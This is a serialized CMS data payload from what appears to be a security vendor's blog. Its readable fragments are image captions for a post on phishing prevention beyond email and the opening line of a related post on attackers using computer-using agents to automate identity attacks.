i":4751},[141182],{"data":141183,"marks":141184,"value":126168,"nodeType":173},{},[141185,141186],{"type":194},{"type":370},{"data":141188,"marks":141189,"value":126172,"nodeType":173},{},[],{"data":141191,"content":141192,"nodeType":178},{},[141193],{"data":141194,"marks":141195,"value":126179,"nodeType":173},{},[],{"data":141197,"content":141198,"nodeType":178},{},[141199],{"data":141200,"marks":141201,"value":126186,"nodeType":173},{},[],{"data":141203,"content":141206,"nodeType":312},{"target":141204},{"sys":141205},{"id":105035,"type":317,"linkType":318},[],{"data":141208,"content":141211,"nodeType":312},{"target":141209},{"sys":141210},{"id":126196,"type":317,"linkType":318},[],{"data":141213,"content":141214,"nodeType":231},{},[],{"data":141216,"content":141217,"nodeType":169},{},[141218],{"data":141219,"marks":141220,"value":126207,"nodeType":173},{},[],{"data":141222,"content":141223,"nodeType":235},{},[141224],{"data":141225,"marks":141226,"value":77025,"nodeType":173},{},[141227],{"type":370},{"data":141229,"content":141230,"nodeType":178},{},[141231],{"data":141232,"marks":141233,"value":126221,"nodeType":173},{},[],{"data":141235,"content":141236,"nodeType":178},{},[141237,141240,141247],{"data":141238,"marks":141239,"value":126228,"nodeType":173},{},[],{"data":141241,"content":141242,"nodeType":186},{"uri":71244},[141243],{"data":141244,"marks":141245,"value":126236,"nodeType":173},{},[141246],{"type":194},{"data":141248,"marks":141249,"value":126240,"nodeType":173},{},[],{"data":141251,"content":141252,"nodeType":3769},{},[141253],{"data":141254,"content":141255,"nodeType":178},{},[141256],{"data":141257,"marks":141258,"value":126250,"nodeType":173},{},[],{"data":141260,"content":141261,"nodeType":178},{},[141262,141265,141272],{"data":141263,"marks":141264,"value":126257,"nodeType":173},{},[],{"data":141266,"content":141267,"nodeType":186},{"uri":126102},[141268],{"data":141269,"marks":141270,"value":126265,"nodeType":173},{},[141271],{"type":194},{"data":141273,"marks":141274,"value":126269,"nodeType":173},{},[],{"data":141276,"content":141277,"nodeType":178},{},[141278],{"data":141279,"marks":141280,"value":126276,"nodeType":173},{},[],{"data":141282,"content":141283,"nodeType":178},{},[141284],{"data":141285,"marks":141286,"value":126283,"nodeType":173},{},[],{"data":141288,"content":141289,"nodeType":3769},{},[141290],{"data":141291,"content":141292,"nodeType":178},{},[141293],{"data":141294,"marks":141295,"value":126293,"nodeType":173},{},[],{"data":141297,"content":141298,"nodeType":235},{},[141299],{"data":141300,"marks":141301,"value":24287,"nodeType":173},{},[141302],{"type":370},{"data":141304,"content":141305,"nodeType":178},{},[141306],{"data":141307,"marks":141308,"value":126307,"nodeType":173},{},[],{"data":141310,"content":141311,"nodeType":178},{},[141312,141315,141323],{"data":141313,"marks":141314,"value":126314,"nodeType":173},{},[],{"data":141316,"content":141317,"nodeType":186},{"uri":62639},[141318],{"data":141319,"marks":141320,"value":126323,"nodeType":173},{},[141321,141322],{"type":194},{"type":370},{"data":141324,"marks":141325,"value":126327,"nodeType":173},{},[],{"data":141327,"content":141330,"nodeType":312},{"target":141328},{"sys":141329},{"id":126332,"type":317,"linkType":318},[],{"data":141332,"content":141333,"nodeType":231},{},[],{"data":141335,"content":141336,"nodeType":169},{},[141337],{"data":141338,"marks":141339,"value":126343,"nodeType":173},{},[],{"data":141341,"content":141342,"nodeType":178},{},[141343],{"data":141344,"marks":141345,"value":126350,"nodeType":173},{},[],{"data":141347,"content":141348,"nodeType":178},{},[141349],{"data":141350,"marks":141351,"value":126357,"nodeType":173},{},[],{"data":141353,"content":141354,"nodeType":250},{},[141355,141371,141387],{"data":141356,"content":141357,"nodeType":254},{},[141358],{"data":141359,"content":141360,"nodeType":178},{},[141361,141364,141368],{"data":141362,"marks":141363,"value":126370,"nodeType":173},{},[],{"data":141365,"marks":141366,"value":126375,"nodeType":173},{},[141367],{"type":370},{"data":141369,"marks":141370,"value":126379,"nodeType":173},{},[],{"data":141372,"content":141373,"nodeType":254},{},[141374],{"data":141375,"content":141376,"nodeType":178},{},[141377,141380,141384],{"data":141378,"marks":141379,"value":126389,"nodeType":173},{},[],{"data":141381,"marks":141382,"value":126394,"nodeType":173},{},[141383],{"type":370},{"data":141385,"marks":141386,"value":126398,"nodeType":173},{},[],{"data":141388,"content":141389,"nodeType":254},{},[141390],{"data":141391,"content":141392,"nodeType":178},{},[141393,141396,141400,141403,141410],{"data":141394,"marks":141395,"value":126408,"nodeType":173},{},[],{"data":141397,"marks":141398,"value":126413,"nodeType":173},{},[141399],{"type":370},{"data":141401,"marks":141402,"value":126417,"nodeType":173},{},[],{"data":141404,"content":141405,"nodeType":186},{"uri":4342},[141406],{"data":141407,"marks":141408,"value":835,"nodeType":173},{},[141409],{"type":194},{"data":141411,"marks":141412,"value":126428,"nodeType":173},{},[],{"data":141414,"content":141415,"nodeType":178},{},[141416],{"data":141417,"marks":141418,"value":126435,"nodeType":173},{},[],{"data":141420,"content":141421,"nodeType":178},{},[141422],{"data":141423,"marks":141424,"value":126442,"nodeType":173},{},[],{"data":141426,"content":141427,"nodeType":178},{},[141428],{"data":141429,"marks":141430,"value":126449,"nodeType":173},{},[],{"data":141432,"content":141433,"nodeType":235},{},[141434],{"data":141435,"marks":141436,"value":126457,"nodeType":173},{},[141437],{"type":370},{"data":141439,"content":141440,"nodeType":178},{},[141441,141444,141452],{"data":141442,"marks":141443,"value":126464,"nodeType":173},{},[],{"data":141445,"content":141446,"nodeType":186},{"uri":126467},[141447],{"data":141448,"marks":141449,"value":126474,"nodeType":173},{},[141450,141451],{"type":194},{"type":370},{"data":141453,"marks":141454,"value":126478,"nodeType":173},{},[],{"data":141456,"content":141457,"nodeType":178},{},[141458],{"data":141459,"marks":141460,"value":126485,"nodeType":173},{},[],{"data":141462,"content":141465,"nodeType":312},{"target":141463},{"sys":141464},{"id":126490,"type":317,"linkType":318},[],{"data":141467,"content":141468,"nodeType":235},{},[141469,141473],{"data":141470,"marks":141471,"value":126499,"nodeType":173},{},[141472],{"type":370},{"data":141474,"marks":141475,"value":3107,"nodeType":173},{},[],{"data":141477,"content":141478,"nodeType":178},{},[141479,141482,141490],{"data":141480,"marks":141481,"value":126509,"nodeType":173},{},[],{"data":141483,"content":141484,"nodeType":186},{"uri":126512},[141485],{"data":141486,"marks":141487,"value":126519,"nodeType":173},{},[141488,141489],{"type":194},{"type":370},{"data":141491,"marks":141492,"value":126523,"nodeType":173},{},[],{"data":141494,"content":141495,"nodeType":178},{},[141496],{"data":141497,"marks":141498,"value":126530,"nodeType":173},{},[],{"data":141500,"content":141501,"nodeType":235},{},[141502],{"data":141503,"marks":141504,"value":126538,"nodeType":173},{},[141505],{"type":370},{"data":141507,"content":141508,"nodeType":178},{},[141509,141512,141520],{"data":141510,"marks":141511,"value":126545,"nodeType":173},{},[],{"data":141513,"content":141514,"nodeType":186},{"uri":77513},[141515],{"data":141516,"marks":141517,"value":2570,"nodeType":173},{},[141518,141519],{"type":194},{"type":370},{"data":141521,"marks":141522,"value":126557,"nodeType":173},{},[],{"data":141524,"content":141525,"nodeType":178},{},[141526],{"data":141527,"marks":141528,"value":126564,"nodeType":173},{},[],{"data":141530,"content":141531,"nodeType":178},{},[141532],{"data":141533,"marks":141534,"value":126571,"nodeType":173},{},[],{"data":141536,"content":141539,"nodeType":312},{"target":141537},{"sys":141538},{"id":126576,"type":317,"linkType":318},[],{"data":141541,"content":141542,"nodeType":231},{},[],{"data":141544,"content":141545,"nodeType":169},{},[141546],{"data":141547,"marks":141548,"value":126587,"nodeType":173},{},[],{"data":141550,"content":141551,"nodeType":178},{},[141552,141555,141561],{"data":141553,"marks":141554,"value":126594,"nodeType":173},{},[],{"data":141556,"content":141557,"nodeType":186},{"uri":473},[141558],{"data":141559,"marks":141560,"value":126601,"nodeType":173},{},[],{"data":141562,"marks":141563,"value":126605,"nodeType":173},{},[],{"items":141565},[141566,141568],{"sys":141567,"name":509},{"id":508},{"sys":141569,"name":26137},{"id":26136},{"items":141571},[141572],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":141573},{"url":2911},{"__typename":1528,"sys":141575,"content":141576,"title":496,"synopsis":497,"hashTags":118,"publishedDate":498,"slug":499,"tagsCollection":141850,"authorsCollection":141856},{"id":162},{"json":141577},{"nodeType":165,"data":141578,"content":141579},{},[141580,141586,141602,141615,141621,141627,141630,141636,141642,141690,141696,141701,141704,141710,141716,141722,141728,141734,141748,141753,141759,141765,141779,141784,141790,141796,141802,141808,141814,141817,141823,141839,141844],{"nodeType":169,"data":141581,"content":141582},{},[141583],{"nodeType":173,"value":174,"marks":141584,"data":141585},[],{},{"nodeType":178,"data":141587,"content":141588},{},[141589,141592,141599],{"nodeType":173,"value":182,"marks":141590,"data":141591},[],{},{"nodeType":186,"data":141593,"content":141594},{"uri":188},[141595],{"nodeType":173,"value":191,"marks":141596,"data":141598},[141597],{"type":194},{},{"nodeType":173,"value":197,"marks":141600,"data":141601},[],{},{"nodeType":178,"data":141603,"content":141604},{},[141605,141608,141612],{"nodeType":173,"value":204,"marks":141606,"data":141607},[],{},{"nodeType":173,"value":208,"marks":141609,"data":141611},[141610],{"type":194},{},{"nodeType":173,"value":213,"marks":141613,"data":141614},[],{},{"nodeType":178,"data":141616,"content":141617},{},[141618],{"nodeType":173,"value":220,"marks":141619,"data":141620},[],{},{"nodeType":178,"data":141622,"content":141623},{},[141624],{"nodeType":173,"value":227,"marks":141625,"data":141626},[],{},{"nodeType":231,"data":141628,"content":141629},{},[],{"nodeType":235,"data":141631,"content":141632},{},[141633],{"nodeType":173,"value":239,"marks":141634,"data":141635},[],{},{"nodeType":178,"data":141637,"content":141638},{},[141639],{"nodeType":173,"value":246,"marks":141640,"data":141641},[],{},{"nodeType":250,"data":141643,"content":141644},{},[141645,141654,141663,141672,141681],{"nodeType":254,"data":141646,"content":141647},{},[141648],{"nodeType":178,"data":141649,"content":141650},{},[141651],{"nodeType":173,"value":261,"marks":141652,"data":141653},[],{},{"nodeType":254,"data":141655,"content":141656},{},[141657],{"nodeType":178,"data":141658,"content":141659},{},[141660],{"nodeType":173,"value":271,"marks":141661,"data":141662},[],{},{"nodeType":254,"data":141664,"content":141665},{},[141666],{"nodeType":178,"data":141667,"content":141668},{},[141669],{"nodeType":173,"value":281,"marks":141670,"data":141671},[],{},{"nodeType":254,"data":141673,"content":141674},{},[141675],{"nodeType":178,"data":141676,"content":141677},{},[141678],{"nodeType":173,"value":291,"marks":141679,"data":141680},[],{},{"nodeType":254,"data":141682,"content":141683},{},[141684],{"nodeType":178,"data":141685,"content":141686},{},[141687],{"nodeType":173,"value":301,"marks":141688,"data":141689},[],{},{"nodeType":178,"data":141691,"content":141692},{},[141693],{"nodeType":173,"value":308,"marks":141694,"data":141695},[],{},{"nodeType":312,"data":141697,"content":141700},{"target":141698},{"sys":141699},{"id":316,"type":317,"linkType":318},[],{"nodeType":231,"data":141702,"content":141703},{},[],{"nodeType":235,"data":141705,"content":141706},{},[141707],{"nodeType":173,"value":327,"marks":141708,"data":141709},[],{},{"nodeType":178,"data":141711,"content":141712},{},[141713],{"nodeType":173,"value":334,"marks":141714,"data":141715},[],{},{"nodeType":178,"data":141717,"content":141718},{},[141719],{"nodeType":173,"value":341,"marks":141720,"data":141721},[],{},{"nodeType":178,"data":141723,"content":141724},{},[141725],{"nodeType":173,"value":348,"marks":141726,"data":141727},[],{},{"nodeType":178,"data":141729,"content":141730},{},[141731],{"nodeType":173,"value":355,"marks":141732,"data":141733},[],{},{"nodeType":235,"data":141735,"content":141736},{},[141737,141740,141745],{"nodeType":173,"value":362,"marks":141738,"data":141739},[],{},{"nodeType":173,"value":366,"marks":141741,"data":141744},[141742,141743],{"type":194},{"type":370},{},{"nodeType":173,"value":373,"marks":141746,"data":141747},[],{},{"nodeType":312,"data":141749,"content":141752},{"target":141750},{"sys":141751},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":141754,"content":141755},{},[141756],{"nodeType":173,"value":386,"marks":141757,"data":141758},[],{},{"nodeType":178,"data":141760,"content":141761},{},[141762],{"nodeType":173,"value":393,"marks":141763,"data":141764},[],{},{"nodeType":235,"data":141766,"content":141767},{},[141768,141771,141776],{"nodeType":173,"value":400,"marks":141769,"data":141770},[],{},{"nodeType":173,"value":404,"marks":141772,"data":141775},[141773,141774],{"type":194},{"type":370},{},{"nodeType":173,"value":410,"marks":141777,"data":141778},[],{},{"nodeType":312,"data":141780,"content":141783},{"target":141781},{"sys":141782},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":141785,"content":141786},{},[141787],{"nodeType":173,"value":423,"marks":141788,"data":141789},[],{},{"nodeType":178,"data":141791,"content":141792},{},[141793],{"nodeType":173,"value":430,"marks":141794,"data":141795},[],{},{"nodeType":178,"data":141797,"content":141798},{},[141799],{"nodeType":173,"value":437,"marks":141800,"data":141801},[],{},{"nodeType":178,"data":141803,"content":141804},{},[141805],{"nodeType":173,"value":444,"marks":141806,"data":141807},[],{},{"nodeType":178,"data":141809,"content":141810},{},[141811],{"nodeType":173,"value":451,"marks":141812,"data":141813},[],{},{"nodeType":231,"data":141815,"content":141816},{},[],{"nodeType":169,"data":141818,"content":141819},{},[141820],{"nodeType":173,"value":461,"marks":141821,"data":141822},[],{},{"nodeType":178,"data":141824,"content":141825},{},[141826,141829,141836],{"nodeType":173,"value":468,"marks":141827,"data":141828},[],{},{"nodeType":186,"data":141830,"content":141831},{"uri":473},[141832],{"nodeType":173,"value":476,"marks":141833,"data":141835},[141834],{"type":194},{},{"nodeType":173,"value":481,"marks":141837,"data":141838},[],{},{"nodeType":312,"data":141840,"content":141843},{"target":141841},{"sys":141842},{"id":488,"type":317,"linkType":318},[],{"nodeType":178,"data":141845,"content":141846},{},[141847],{"nodeType":173,"value":37,"marks":141848,"data":141849},[],{},{"items":141851},[141852,141854],{"sys":141853,"name":505},{"id":504},{"sys":141855,"name":509},{"id":508},{"items":141857},[141858],{"fullName":513,"firstName":71176,"jobTitle":514,"profilePicture":141859},{"url":516},{"url":141861},"https://images.ctfassets.net/y1cdw1ablpvd/5D3plIXabnqgyWWtxOXjHp/985db5f050236a3cfb7051dc873a39e2/1_-_Thumbnail.png",{"items":141863},[141864],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":141865},{"url":1496},{"json":141867,"links":142402},{"nodeType":165,"data":141868,"content":141869},{},[141870,141876,141902,141907,141913,141916,141923,141929,141935,141964,141970,141976,141982,141985,141992,142008,142014,142020,142025,142031,142037,142040,142047,142053,142059,142064,142070,142086,142112,142118,142121,142128,142134,142140,142145,142151,142157,142163,142168,142174,142179,142185,142188,142195,142201,142207,142210,142217,142223,142229,142235,142238,142245,142251,142257,142263,142269,142275,142280,142286,142292,142297,142303,142333,142339,142349,142365,142370,142373,142380,142386],{"nodeType":178,"data":141871,"content":141872},{},[141873],{"nodeType":173,"value":128802,"marks":141874,"data":141875},[],{},{"nodeType":178,"data":141877,"content":141878},{},[141879,141882,141889,141892,141899],{"nodeType":173,"value":128809,"marks":141880,"data":141881},[],{},{"nodeType":186,"data":141883,"content":141884},{"uri":125982},[141885],{"nodeType":173,"value":1300,"marks":141886,"data":141888},[141887],{"type":194},{},{"nodeType":173,"value":128820,"marks":141890,"data":141891},[],{},{"nodeType":186,"data":141893,"content":141894},{"uri":128825},[141895],{"nodeType":173,"value":128828,"marks":141896,"data":141898},[141897],{"type":194},{},{"nodeType":173,"value":197,"marks":141900,"data":141901},[],{},{"nodeType":312,"data":141903,"content":141906},{"target":141904},{"sys":141905},{"id":128839,"type":317,"linkType":318},[],{"nodeType":178,"data":141908,"content":141909},{},[141910],{"nodeType":173,"value":128845,"marks":141911,"data":141912},[],{},{"nodeType":231,"data":141914,"content":141915},{},[],{"nodeType":169,"data":141917,"content":141918},{},[141919],{"nodeType":173,"value":128855,"marks":141920,"data":141922},[141921],{"type":370},{},{"nodeType":178,"data":141924,"content":141925},{},[141926],{"nodeType":173,"value":128863,"marks":141927,"data":141928},[],{},{"nodeType":178,"data":141930,"content":141931},{},[141932],{"nodeType":173,"value":128870,"marks":141933,"data":141934},[],{},{"nodeType":250,"data":141936,"content":141937},{},[141938,141951],{"nodeType":254,"data":141939,"content":141940},{},[141941],{"nodeType":178,"data":141942,"content":141943},{},[141944,141948],{"nodeType":173,"value":128883,"marks":141945,"data":141947},[141946],{"type":370},{},{"nodeType":173,"value":128888,"marks":141949,"data":141950},[],{},{"nodeType":254,"data":141952,"content":141953},{},[141954],{"nodeType":178,"data":141955,"content":141956},{},[141957,141961],{"nodeType":173,"value":128898,"marks":141958,"data":141960},[141959],{"type":370},{},{"nodeType":173,"value":128903,"marks":141962,"data":141963},[],{},{"nodeType":178,"data":141965,"content":141966},{},[141967],{"nodeType":173,"value":128910,"marks":141968,"data":141969},[],{},{"nodeType":178,"data":141971,"content":141972},{},[141973],{"nodeType":173,"value":128917,"marks":141974,"data":141975},[],{},{"nodeType":178,"data":141977,"content":141978},{},[141979],{"nodeType":173,"value":128924,"marks":141980,"data":141981},[],{},{"nodeType":231,"data":141983,"content":141984},{},[],{"nodeType":169,"data":141986,"content":141987},{},[141988],{"nodeType":173,"value":128934,"marks":141989,"data":141991},[141990],{"type":370},{},{"nodeType":178,"data":141993,"content":141994},{},[141995,141998,142005],{"nodeType":173,"value":128942,"marks":141996,"data":141997},[],{},{"nodeType":186,"data":141999,"content":142000},{"uri":128947},[142001],{"nodeType":173,"value":128950,"marks":142002,"data":142004},[142003],{"type":194},{},{"nodeType":173,"value":1477,"marks":142006,"data":142007},[],{},{"nodeType":178,"data":142009,"content":142010},{},[142011],{"nodeType":173,"value":128961,"marks":142012,"data":142013},[],{},{"nodeType":178,"data":142015,"content":142016},{},[142017],{"nodeType":173,"value":128968,"marks":142018,"data":142019},[],{},{"nodeType":312,"data":142021,"content":142024},{"target":142022},{"sys":142023},{"id":128975,"type":317,"linkType":318},[],{"nodeType":178,"data":142026,"content":142027},{},[142028],{"nodeType":173,"value":128981,"marks":142029,"data":142030},[],{},{"nodeType":178,"data":142032,"content":142033},{},[142034],{"nodeType":173,"value":128988,"marks":142035,"data":142036},[],{},{"nodeType":231,"data":142038,"content":142039},{},[],{"nodeType":235,"data":142041,"content":142042},{},[142043],{"nodeType":173,"value":128998,"marks":142044,"data":142046},[142045],{"type":370},{},{"nodeType":178,"data":142048,"content":142049},{},[142050],{"nodeType":173,"value":129006,"marks":142051,"data":142052},[],{},{"nodeType":178,"data":142054,"content":142055},{},[142056],{"nodeType":173,"value":129013,"marks":142057,"data":142058},[],{},{"nodeType":312,"data":142060,"content":142063},{"target":142061},{"sys":142062},{"id":74541,"type":317,"linkType":318},[],{"nodeType":178,"data":142065,"content":142066},{},[142067],{"nodeType":173,"value":129025,"marks":142068,"data":142069},[],{},{"nodeType":178,"data":142071,"content":142072},{},[142073,142076,142083],{"nodeType":173,"value":129032,"marks":142074,"data":142075},[],{},{"nodeType":186,"data":142077,"content":142078},{"uri":129037},[142079],{"nodeType":173,"value":129040,"marks":142080,"data":142082},[142081],{"type":194},{},{"nodeType":173,"value":129045,"marks":142084,"data":142085},[],{},{"nodeType":178,"data":142087,"content":142088},{},[142089,142092,142099,142102,142109],{"nodeType":173,"value":129052,"marks":142090,"data":142091},[],{},{"nodeType":186,"data":142093,"content":142094},{"uri":129057},[142095],{"nodeType":173,"value":129060,"marks":142096,"data":142098},[142097],{"type":194},{},{"nodeType":173,"value":129065,"marks":142100,"data":142101},[],{},{"nodeType":186,"data":142103,"content":142104},{"uri":129070},[142105],{"nodeType":173,"value":129073,"marks":142106,"data":142108},[142107],{"type":194},{},{"nodeType":173,"value":129078,"marks":142110,"data":142111},[],{},{"nodeType":178,"data":142113,"content":142114},{},[142115],{"nodeType":173,"value":129085,"marks":142116,"data":142117},[],{},{"nodeType":231,"data":142119,"content":142120},{},[],{"nodeType":235,"data":142122,"content":142123},{},[142124],{"nodeType":173,"value":129095,"marks":142125,"data":142127},[142126],{"type":370},{},{"nodeType":178,"data":142129,"content":142130},{},[142131],{"nodeType":173,"value":129103,"marks":142132,"data":142133},[],{},{"nodeType":178,"data":142135,"content":142136},{},[142137],{"nodeType":173,"value":129110,"marks":142138,"data":142139},[],{},{"nodeType":312,"data":142141,"content":142144},{"target":142142},{"sys":142143},{"id":129117,"type":317,"linkType":318},[],{"nodeType":178,"data":142146,"content":142147},{},[142148],{"nodeType":173,"value":125165,"marks":142149,"data":142150},[],{},{"nodeType":178,"data":142152,"content":142153},{},[142154],{"nodeType":173,"value":129129,"marks":142155,"data":142156},[],{},{"nodeType":178,"data":142158,"content":142159},{},[142160],{"nodeType":173,"value":129136,"marks":142161,"data":142162},[],{},{"nodeType":312,"data":142164,"content":142167},{"target":142165},{"sys":142166},{"id":107007,"type":317,"linkType":318},[],{"nodeType":178,"data":142169,"content":142170},{},[142171],{"nodeType":173,"value":129148,"marks":142172,"data":142173},[],{},{"nodeType":312,"data":142175,"content":142178},{"target":142176},{"sys":142177},{"id":129155,"type":317,"linkType":318},[],{"nodeType":178,"data":142180,"content":142181},{},[142182],{"nodeType":173,"value":129161,"marks":142183,"data":142184},[],{},{"nodeType":231,"data":142186,"content":142187},{},[],{"nodeType":169,"data":142189,"content":142190},{},[142191],{"nodeType":173,"value":129171,"marks":142192,"data":142194},[142193],{"type":370},{},{"nodeType":178,"data":142196,"content":142197},{},[142198],{"nodeType":173,"value":129179,"marks":142199,"data":142200},[],{},{"nodeType":178,"data":142202,"content":142203},{},[142204],{"nodeType":173,"value":129186,"marks":142205,"data":142206},[],{},{"nodeType":231,"data":142208,"content":142209},{},[],{"nodeType":169,"data":142211,"content":142212},{},[142213],{"nodeType":173,"value":129196,"marks":142214,"data":142216},[142215],{"type":370},{},{"nodeType":178,"data":142218,"content":142219},{},[142220],{"nodeType":173,"value":129204,"marks":142221,"data":142222},[],{},{"nodeType":178,"data":142224,"content":142225},{},[142226],{"nodeType":173,"value":129211,"marks":142227,"data":142228},[],{},{"nodeType":178,"data":142230,"content":142231},{},[142232],{"nodeType":173,"value":129218,"marks":142233,"data":142234},[],{},{"nodeType":231,"data":142236,"content":142237},{},[],{"nodeType":235,"data":142239,"content":142240},{},[142241],{"nodeType":173,"value":129228,"marks":142242,"data":142244},[142243],{"type":370},{},{"nodeType":178,"data":142246,"content":142247},{},[142248],{"nodeType":173,"value":129236,"marks":142249,"data":142250},[],{},{"nodeType":178,"data":142252,"content":142253},{},[142254],{"nodeType":173,"value":129243,"marks":142255,"data":142256},[],{},{"nodeType":178,"data":142258,"content":142259},{},[142260],{"nodeType":173,"value":129250,"marks":142261,"data":142262},[],{},{"nodeType":178,"data":142264,"content":142265},{},[142266],{"nodeType":173,"value":129257,"marks":142267,"data":142268},[],{},{"nodeType":178,"data":142270,"content":142271},{},[142272],{"nodeType":173,"value":129264,"marks":142273,"data":142274},[],{},{"nodeType":312,"data":142276,"content":142279},{"target":142277},{"sys":142278},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":142281,"content":142282},{},[142283],{"nodeType":173,"value":129276,"marks":142284,"data":142285},[],{},{"nodeType":178,"data":142287,"content":142288},{},[142289],{"nodeType":173,"value":129283,"marks":142290,"data":142291},[],{},{"nodeType":312,"data":142293,"content":142296},{"target":142294},{"sys":142295},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":142298,"content":142299},{},[142300],{"nodeType":173,"value":129295,"marks":142301,"data":142302},[],{},{"nodeType":250,"data":142304,"content":142305},{},[142306,142315,142324],{"nodeType":254,"data":142307,"content":142308},{},[142309],{"nodeType":178,"data":142310,"content":142311},{},[142312],{"nodeType":173,"value":129308,"marks":142313,"data":142314},[],{},{"nodeType":254,"data":142316,"content":142317},{},[142318],{"nodeType":178,"data":142319,"content":142320},{},[142321],{"nodeType":173,"value":129318,"marks":142322,"data":142323},[],{},{"nodeType":254,"data":142325,"content":142326},{},[142327],{"nodeType":178,"data":142328,"content":142329},{},[142330],{"nodeType":173,"value":98253,"marks":142331,"data":142332},[],{},{"nodeType":178,"data":142334,"content":142335},{},[142336],{"nodeType":173,"value":98260,"marks":142337,"data":142338},[],{},{"nodeType":178,"data":142340,"content":142341},{},[142342,142345],{"nodeType":173,"value":129340,"marks":142343,"data":142344},[],{},{"nodeType":173,"value":129344,"marks":142346,"data":142348},[142347],{"type":370},{},{"nodeType":178,"data":142350,"content":142351},{},[142352,142355,142362],{"nodeType":173,"value":129352,"marks":142353,"data":142354},[],{},{"nodeType":186,"data":142356,"content":142357},{"uri":129357},[142358],{"nodeType":173,"value":129360,"marks":142359,"data":142361},[142360],{"type":194},{},{"nodeType":173,"value":129365,"marks":142363,"data":142364},[],{},{"nodeType":312,"data":142366,"content":142369},{"target":142367},{"sys":142368},{"id":129372,"type":317,"linkType":318},[],{"nodeType":231,"data":142371,"content":142372},{},[],{"nodeType":169,"data":142374,"content":142375},{},[142376],{"nodeType":173,"value":461,"marks":142377,"data":142379},[142378],{"type":370},{},{"nodeType":178,"data":142381,"content":142382},{},[142383],{"nodeType":173,"value":98309,"marks":142384,"data":142385},[],{},{"nodeType":178,"data":142387,"content":142388},{},[142389,142392,142399],{"nodeType":173,"value":61741,"marks":142390,"data":142391},[],{},{"nodeType":186,"data":142393,"content":142394},{"uri":77659},[142395],{"nodeType":173,"value":476,"marks":142396,"data":142398},[142397],{"type":194},{},{"nodeType":173,"value":77665,"marks":142400,"data":142401},[],{},{"entries":142403},{"hyperlink":142404,"inline":142405,"block":142406},[],[],[142407,142415,142421,142428,142433,142436,142443,142449,142455],{"sys":142408,"__typename":5345,"title":142409,"caption":142410,"layoutMode":118,"file":142411},{"id":128839},"Source: 2024 Trends in Identity Security - Identity Defined Security Alliance (IDSA)","Source: 2024 Trends in Identity Security – Identity Defined Security Alliance (IDSA)",{"url":142412,"width":142413,"height":142414},"https://images.ctfassets.net/y1cdw1ablpvd/4wcIXJu4Yhq7lHZuGbX1w0/b097fff859f61a0e853f8a10e2d838aa/image7.png",1730,782,{"sys":142416,"__typename":5345,"title":142417,"caption":142418,"layoutMode":118,"file":142419},{"id":128975},"Evilginx screenshot - email controls blog","Evilginx being used to take over an M365 account",{"url":142420,"width":5358,"height":15261},"https://images.ctfassets.net/y1cdw1ablpvd/4fhOQ0Vohnrd8X0WaJkXDZ/82832b1f912717ca3782d9163daa8781/3.png",{"sys":142422,"__typename":5345,"title":142423,"caption":142424,"layoutMode":118,"file":142425},{"id":74541},"Pyramid of Pain: Original","Original Pyramid of Pain model, created by David Bianco.",{"url":142426,"width":5400,"height":142427},"https://images.ctfassets.net/y1cdw1ablpvd/7dPJT7PYKX71FCCi0GeDzg/16fb3b07959612a45c1b7636da33e541/image3.png",405,{"sys":142429,"__typename":5345,"title":142430,"caption":142431,"layoutMode":118,"file":142432},{"id":129117},"Turnstile requiring human interaction","Cloudflare Turnstile requiring human interaction",{"url":123320,"width":123321,"height":123322},{"sys":142434,"__typename":5345,"title":132202,"caption":132202,"layoutMode":118,"file":142435},{"id":107007},{"url":132204,"width":132205,"height":19669},{"sys":142437,"__typename":5345,"title":142438,"caption":142439,"layoutMode":118,"file":142440},{"id":129155},"Comparing a fake and real M365 login page","The left image is a fake login page — looks pretty believable though, right?",{"url":142441,"width":5358,"height":142442},"https://images.ctfassets.net/y1cdw1ablpvd/4piMCOgm2TgWBiKjyjL0Tw/d0a7ab35f9173f639b8454215536938e/7.png",871,{"sys":142444,"__typename":5345,"title":142445,"caption":142446,"layoutMode":118,"file":142447},{"id":380},"Phishing detection without Push","Phishing detection: Without Push (it's not looking good...)",{"url":142448,"width":132212,"height":132213},"https://images.ctfassets.net/y1cdw1ablpvd/1oBYz6u0WH0gMnd89bkZjU/61bf589f62b898b91e4f8045caf1d4e1/Phishing_detection_without_Push__3_.png",{"sys":142450,"__typename":5345,"title":142451,"caption":142452,"layoutMode":118,"file":142453},{"id":417},"Phishing detection: With Push","Phishing detection: With Push (Pow! Take that attacker)",{"url":142454,"width":132212,"height":132213},"https://images.ctfassets.net/y1cdw1ablpvd/7lxmav3wYkltbFp3N9KeIQ/06080c5b629590fe3551cf5944f011ec/Phishing_detection_with_Push__2_.png",{"sys":142456,"__typename":5345,"title":142457,"caption":142458,"layoutMode":118,"file":142459},{"id":129372},"Updated Pyramid of Pain (IoCs and TTPs)","Applying the Pyramid of Pain to identity-based attacks",{"url":142460,"width":5358,"height":142461},"https://images.ctfassets.net/y1cdw1ablpvd/7kfzRw2EuOtDbaDTIQI7r0/8304e44e0feb903e8db3bbdf12243d76/10.png",1477,"content:blog:why-its-time-for-phishing-prevention-to-move-beyond-email.json","blog/why-its-time-for-phishing-prevention-to-move-beyond-email.json","blog/why-its-time-for-phishing-prevention-to-move-beyond-email",{"_path":142466,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":142467,"summary":142469,"title":139234,"subtitle":118,"metaTitle":142480,"synopsis":139235,"hashTags":118,"publishedDate":139236,"slug":139237,"ogImage":142481,"tagsCollection":142483,"content":142489,"relatedBlogPostsCollection":143084,"authorsCollection":145335,"_id":145339,"_type":5439,"_source":5440,"_file":145340,"_stem":145341,"_extension":5439},"/blog/5-ways-attackers-can-use-computer-using-agents-to-automate-identity-attacks",{"id":138663,"publishedAt":142468},"2025-03-13T09:58:46.319Z",{"json":142470},{"data":142471,"content":142472,"nodeType":165},{},[142473],{"data":142474,"content":142475,"nodeType":178},{},[142476],{"data":142477,"marks":142478,"value":142479,"nodeType":173},{},[],"We recently blogged about the security implications of Computer-Using Agents (CUAs) like OpenAI Operator. We got pretty hooked on this new development and went off to do some closer research. Now, we’re back with part two to share what we found. Let’s dive in. ","Using CUAs like Operator to automate identity 